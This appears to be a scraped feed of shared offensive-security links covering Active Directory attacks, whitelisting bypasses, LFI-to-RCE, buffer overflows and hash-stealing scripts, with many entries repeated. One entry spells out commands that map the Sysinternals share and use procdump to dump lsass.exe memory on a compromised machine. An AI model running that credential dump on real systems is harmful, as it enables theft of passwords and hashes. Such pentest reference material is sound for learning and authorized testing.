Fun with LDAP, Kerberos (and MSRPC) in AD Environments
https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments
https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments
Speaker Deck
Fun with LDAP, Kerberos (and MSRPC) in AD Environments
Slides from my Track X Thotcon 2018 Workshop entitled:
"Fun with LDAP, Kerberos (and MSRPC) in AD Environments"
If you want the embedded Gifs/Vide…
"Fun with LDAP, Kerberos (and MSRPC) in AD Environments"
If you want the embedded Gifs/Vide…
Interesting vuln allows attacker to bypass auth for android phone by taking a Skype call ☎️ 🔓
https://youtu.be/EiEcwOfTFqI
https://youtu.be/EiEcwOfTFqI
YouTube
Skype Android Authentication Bypass
Skype Android Authentication Bypass
Florian Kunushevci
https://www.linkedin.com/in/floriankunushevci/
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0622
Florian Kunushevci
https://www.linkedin.com/in/floriankunushevci/
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0622
Map #Sysinternals tools folder locally, run tools when required. Useful on a compromised remote machine to avoid tool clutter.
net use Z: \\http://live.sysinternals.com \tools\ "/user:"
dir Z:
Z:\procdump -accepteula -ma lsass.exe lsassdmp
net use Z: \\http://live.sysinternals.com \tools\ "/user:"
dir Z:
Z:\procdump -accepteula -ma lsass.exe lsassdmp
Pwning with Responder – A Pentester’s Guide
https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/
https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/
WMIC.EXE Whitelisting Bypass - Hacking with Style, Stylesheets
https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html
https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html
Mobile Application Penetration Testing Cheat Sheet
https://github.com/sh4hin/MobileApp-Pentest-Cheatsheet
https://github.com/sh4hin/MobileApp-Pentest-Cheatsheet
GitHub
GitHub - sh4hin/MobileApp-Pentest-Cheatsheet: The Mobile App Pentest cheat sheet was created to provide concise collection of high…
The Mobile App Pentest cheat sheet was created to provide concise collection of high value information on specific mobile application penetration testing topics. - sh4hin/MobileApp-Pentest-Cheatsheet
SMTP Log Poisioning through LFI to Remote Code Exceution
https://www.hackingarticles.in/smtp-log-poisioning-through-lfi-to-remote-code-exceution/
https://www.hackingarticles.in/smtp-log-poisioning-through-lfi-to-remote-code-exceution/
Hacking Articles
SMTP Log Poisoning through LFI to Remote Code Execution - Hacking Articles
In this Post, we will be discussing on SMTP log poisoning. But before getting in details, kindly read our previous articles for “SMTP Lab Set-Up”
Buffer Overflow Practical Examples , metasploit , gdb and objdump ! - protostar stack3
https://0xrick.github.io/binary-exploitation/bof3/
https://0xrick.github.io/binary-exploitation/bof3/
0xRick's Blog
Buffer Overflow Examples, Overwriting a function pointer - protostar stack3
Another post where I overwrite a variable value which is used as a function pointer. (x32)
BOVSTT – Buffer Overflow Vulnerability Services Tester Tool
https://hakin9.org/bovstt-buffer-overflow-vulnerability-services-tester-tool/
https://hakin9.org/bovstt-buffer-overflow-vulnerability-services-tester-tool/
COM XSL Transformation: Bypassing Microsoft Application Control Solutions (CVE-2018-8492)
https://bohops.com/2019/01/10/com-xsl-transformation-bypassing-microsoft-application-control-solutions-cve-2018-8492/
https://bohops.com/2019/01/10/com-xsl-transformation-bypassing-microsoft-application-control-solutions-cve-2018-8492/
bohops
COM XSL Transformation: Bypassing Microsoft Application Control Solutions (CVE-2018-8492)
Introduction Greetings, Everyone! It has been several months since I’ve blogged, so it seems fitting to start the New Year off with a post about two topics that I thoroughly enjoy exploring: …
Some CNA scripts with great ideas like Invoke-CredLeak to get the NETNTLMv2 hash for a user when on a machine for cracking.
https://github.com/vysecurity/Aggressor-VYSEC
https://github.com/vysecurity/Aggressor-VYSEC
GitHub
GitHub - vysecurity/Aggressor-VYSEC
Contribute to vysecurity/Aggressor-VYSEC development by creating an account on GitHub.
Creating Symbolic Links in Windows 10
https://decoder.cloud/2019/01/04/creating-symbolic-links-in-windows-10/
https://decoder.cloud/2019/01/04/creating-symbolic-links-in-windows-10/